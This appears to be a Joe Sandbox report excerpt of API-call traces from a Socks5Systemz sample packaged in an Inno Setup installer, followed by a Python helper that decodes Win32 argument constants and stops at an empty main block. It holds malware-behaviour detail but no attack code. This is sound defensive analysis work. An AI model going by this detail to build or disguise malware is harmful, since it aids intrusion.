  • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
• ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
  • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
APIs
• SetWindowTextA.USER32(?,00000000), ref: 0042424C
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00450CD7,00000000), ref: 0042CC0B
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00464010,00000000,00000000,00000000,0000000C,00000000), ref: 004633BC
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
                                                                                        • Part of subcall function 0044FE10: GetLastError.KERNEL32(0044FC2C,0044FED2,?,00000000,?,00492588,00000001,00000000,00000002,00000000,004926E9,?,?,00000005,00000000,0049271D), ref: 0044FE13
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorFileLast
APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,00492516,00000000,004926E9,?,?,00000005,00000000,0049271D,?,?,00000000), ref: 0040721B
Similarity
• API ID: CurrentDirectory
APIs
• SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
Similarity
• API ID: ErrorMode
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C3D8
Similarity
• API ID: AllocVirtual
APIs
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
Similarity
• API ID: AllocVirtual
APIs
• GetLastError.KERNEL32(00000000,00451C35), ref: 00451C17
Similarity
• API ID: ErrorLast
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,0045C3CE), ref: 0045C307
Similarity
• API ID: FreeVirtual
Similarity
• API ID: CloseHandle
APIs
  • Part of subcall function 0044B038: GetVersionExA.KERNEL32(00000094), ref: 0044B055
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F1A9,00493215), ref: 0044B0B3
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B0CB
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B0DD
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B0EF
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B101
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B113
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B125
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B137
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B149
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B15B
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B16D
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B17F
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B191
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B1A3
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B1B5
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B1C7
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B1D9
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B1EB
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B1FD
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B20F
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B221
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B233
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B245
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B257
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B269
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B27B
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B28D
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B29F
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B2B1
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B2C3
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B2D5
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B2E7
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B2F9
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B30B
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B31D
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B32F
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B341
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B353
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B365
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B377
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B389
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B39B
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B3AD
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B3BF
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B3D1
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B3E3
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B3F5
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B407
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                      • API String ID: 1968650500-2910565190
                                                                                      • Opcode ID: c0b6a7321769edc8054774f6e1a4a7cc645fbf4eca71de10d65dcd89c53b7c41
                                                                                      • Instruction ID: fe7ec38607b22d39bed663b2d58cef56837bfbcccade8a066643eb3a06087c6f
                                                                                      • Opcode Fuzzy Hash: c0b6a7321769edc8054774f6e1a4a7cc645fbf4eca71de10d65dcd89c53b7c41
                                                                                      • Instruction Fuzzy Hash: 3B91E3B0A40B50EFEF00EBF598C6A2636A8EB15B18B15457BB444EF296C778D804CF5D
APIs
• GetTickCount.KERNEL32 ref: 00456DF3
• QueryPerformanceCounter.KERNEL32(02313858,00000000,00457086,?,?,02313858,00000000,?,00457782,?,02313858,00000000), ref: 00456DFC
• GetSystemTimeAsFileTime.KERNEL32(02313858,02313858), ref: 00456E06
• GetCurrentProcessId.KERNEL32(?,02313858,00000000,00457086,?,?,02313858,00000000,?,00457782,?,02313858,00000000), ref: 00456E0F
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456E85
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02313858,02313858), ref: 00456E93
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00494AB0,00000003,00000000,00000000,00000000,00457042), ref: 00456EDB
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457031,?,00000000,C0000000,00000000,00494AB0,00000003,00000000,00000000,00000000,00457042), ref: 00456F14
  • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456FBD
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456FF3
• CloseHandle.KERNEL32(000000FF,00457038,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0045702B
  • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
• Opcode ID: 53890445295be3d3d31e52727ea490adc7ccb43dce6168ff118a2784991df1db
• Instruction ID: f6538b9f74412226b669bfece35f7f8b6dba794c0ca87bd4e30d5109fc12bfbf
• Opcode Fuzzy Hash: 53890445295be3d3d31e52727ea490adc7ccb43dce6168ff118a2784991df1db
• Instruction Fuzzy Hash: 49716470A04744AFDB20DB69DC41B5EBBF8AB05705F5084BAF908EB282D7785948CF69
APIs
• GetVersion.KERNEL32 ref: 0045B2B6
• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045B2D6
• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045B2E3
• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045B2F0
• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045B2FE
  • Part of subcall function 0045B1A4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045B243,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045B21D
• AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B4F1,?,?,00000000), ref: 0045B3B7
• GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B4F1,?,?,00000000), ref: 0045B3C0
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
• String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
• API String ID: 59345061-4263478283
• Opcode ID: 1d806d9dda6068bb291ca6d6d76056618574950846b2f0729205e6ddb2b5ae31
• Instruction ID: c7fa785e835f4f31fbb174cc3c8bee0aea38d4a0e272f0ec20846287379b14aa
• Opcode Fuzzy Hash: 1d806d9dda6068bb291ca6d6d76056618574950846b2f0729205e6ddb2b5ae31
• Instruction Fuzzy Hash: 455174B1900608EFDB10DF99C845BEEB7B8EB49315F14806AF904B7382D7789945CFA9
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 00473A17
• GetLastError.KERNEL32(?,?), ref: 00473A20
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473A6D
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473A91
• CloseHandle.KERNEL32(00000000,00473AC2,00000000,00000000,000000FF,000000FF,00000000,00473ABB,?,?,?), ref: 00473AB5
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 171997614-221126205
• Opcode ID: bdd79b2e264e3947b3271ce07b307c804a443899bf148872aca85f54ba098470
• Instruction ID: fd51c6fdc7ef3a5c4723c7cab516b72f55abc6f577cd61f87c3a1e5de1d1d72d
• Opcode Fuzzy Hash: bdd79b2e264e3947b3271ce07b307c804a443899bf148872aca85f54ba098470
• Instruction Fuzzy Hash: C92167B0A00204ABDB14EFA98943ADD76E8EF05709F50843BF548F62C2DB7C9A04975D
APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: fa9062f2f8c7c292f6ba47f23b62071bd1c02060dccc7d557ee2b61b6739a24d
• Instruction ID: 22a298226f26ad5282d2b06c056c5494fcfa573f7ff451a3aba74327ab4f92ef
• Opcode Fuzzy Hash: fa9062f2f8c7c292f6ba47f23b62071bd1c02060dccc7d557ee2b61b6739a24d
• Instruction Fuzzy Hash: A6917271B04214FFD710EBA9DA86F9D77F4AB09314F5104BAF504AB3A2C778AE409B58
APIs
• IsIconic.USER32(?), ref: 00418303
• GetWindowPlacement.USER32(?,0000002C), ref: 00418320
• GetWindowRect.USER32(?), ref: 0041833C
• GetWindowLongA.USER32(?,000000F0), ref: 0041834A
• GetWindowLongA.USER32(?,000000F8), ref: 0041835F
• ScreenToClient.USER32(00000000), ref: 00418368
• ScreenToClient.USER32(00000000,?), ref: 00418373
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
• Opcode ID: 76ed797ea6865fddbc3593e7458191c6aaa261637689223d055d8f073444f388
• Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
• Opcode Fuzzy Hash: 76ed797ea6865fddbc3593e7458191c6aaa261637689223d055d8f073444f388
• Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00453FDF
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453FE5
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453FFE
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454025
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045402A
• ExitWindowsEx.USER32(00000002,00000000), ref: 0045403B
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 38b00b688662a0d9bbbecbe7d33395a35eb7a17cbac0a46106fc5b3172d15a50
• Instruction ID: fefb7ae41868014354d83cb3ae28757c4cdc7dcc71e7b198ec4e0078f4c74e40
• Opcode Fuzzy Hash: 38b00b688662a0d9bbbecbe7d33395a35eb7a17cbac0a46106fc5b3172d15a50
• Instruction Fuzzy Hash: 06F06270694702B5E620AA758C07F6B25989B80F8DF60492ABE45EF1C3D6BCC54C4A2A
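The function listings above print every numeric argument as raw hex: 40080003 to CreateNamedPipeA, C0000000 and 00000003 to CreateFileA, 0C000000 in the CreateProcessA line, 00000028 to OpenProcessToken, 00000002 to ExitWindowsEx and 00000003 to ShowWindow. The strings in those same blocks (\\.\pipe\InnoSetup64BitHelper-..., "helper %d 0x%x", SeShutdownPrivilege) identify them as the Inno Setup installer runtime's own 64-bit helper, restart and window code rather than the Socks5Systemz payload, which is worth knowing before spending time on them. The Python below is an added example for reading this report, not Joe Sandbox's code and not code from the sample: it parses lines in the report's APIs format and expands the documented Win32 constants at the argument positions it knows about, leaving everything else raw. The sample lines are copied from this page. One caveat that the code documents: the CreateProcessA line on this page shows one value ahead of lpApplicationName, so dwCreationFlags is taken from printed position 6, one slot right of the documented parameter index.

```python
"""Decode hex arguments in Joe Sandbox 'APIs' listing lines into Win32 constant names.

Added example for reading this report; not Joe Sandbox's code and not code from the
sample. REPORT_LINES are copied from this page. The tables hold documented Win32
constants for the argument positions decoded here; anything else is left raw.
"""
import re

# Bit-field arguments: (function, argument index as printed) -> {mask: name}.
FLAGS = {
    ("CreateNamedPipeA", 1): {                                  # dwOpenMode
        0x1: "PIPE_ACCESS_INBOUND", 0x2: "PIPE_ACCESS_OUTBOUND", 0x3: "PIPE_ACCESS_DUPLEX",
        0x00080000: "FILE_FLAG_FIRST_PIPE_INSTANCE", 0x40000000: "FILE_FLAG_OVERLAPPED"},
    ("CreateNamedPipeA", 2): {                                  # dwPipeMode
        0x2: "PIPE_READMODE_MESSAGE", 0x4: "PIPE_TYPE_MESSAGE", 0x8: "PIPE_NOWAIT"},
    ("CreateFileA", 1): {                                       # dwDesiredAccess
        0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ"},
    # dwCreationFlags at printed index 6: this page's CreateProcessA line shows one
    # value ahead of lpApplicationName, so it sits one slot right of parameter 5.
    ("CreateProcessA", 6): {
        0x4: "CREATE_SUSPENDED", 0x10: "CREATE_NEW_CONSOLE",
        0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"},
    ("OpenProcessToken", 1): {                                  # DesiredAccess
        0x2: "TOKEN_DUPLICATE", 0x8: "TOKEN_QUERY", 0x20: "TOKEN_ADJUST_PRIVILEGES"},
    ("ExitWindowsEx", 0): {                                     # uFlags
        0x0: "EWX_LOGOFF", 0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT",
        0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF"},
}
# Exact-value arguments.
ENUMS = {
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("ShowWindow", 1): {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 3: "SW_MAXIMIZE", 5: "SW_SHOW"},
}

API_RE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line):
    """Return (function, module, args, ref) or None. 8-hex-digit args become ints."""
    m = API_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else a for a in raw]
    return m["func"], m["module"], args, int(m["ref"], 16)


def decode_flags(value, table):
    """Expand a bit-field; multi-bit masks (e.g. DUPLEX) are matched before single bits."""
    if value == 0:
        return [table.get(0, "0")]
    names, remaining = [], value
    for mask in sorted(table, key=lambda m: (bin(m).count("1"), m), reverse=True):
        if mask and remaining & mask == mask:
            names.append(table[mask])
            remaining &= ~mask
    if remaining:                               # bits with no table entry, kept raw
        names.append(f"0x{remaining:X}")
    return names


def annotate(line):
    parsed = parse_api_line(line)
    if parsed is None:
        return None
    func, module, args, ref = parsed
    decoded = {}
    for idx, arg in enumerate(args):
        if not isinstance(arg, int):
            continue
        if (func, idx) in FLAGS:
            decoded[idx] = " | ".join(decode_flags(arg, FLAGS[(func, idx)]))
        elif (func, idx) in ENUMS and arg in ENUMS[(func, idx)]:
            decoded[idx] = ENUMS[(func, idx)][arg]
    return {"func": func, "module": module, "args": args, "ref": ref, "decoded": decoded}


def decode_report(lines):
    return [entry for entry in map(annotate, lines) if entry is not None]


REPORT_LINES = [  # copied from this page's listings
    "• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456E85",
    "• CreateFileA.KERNEL32(00000000,C0000000,00000000,00494AB0,00000003,00000000,00000000,00000000,00457042), ref: 00456EDB",
    "• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456FBD",
    "• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453FE5",
    "• ExitWindowsEx.USER32(00000002,00000000), ref: 0045403B",
    "• GetTickCount.KERNEL32 ref: 00456DF3",
]

if __name__ == "__main__":
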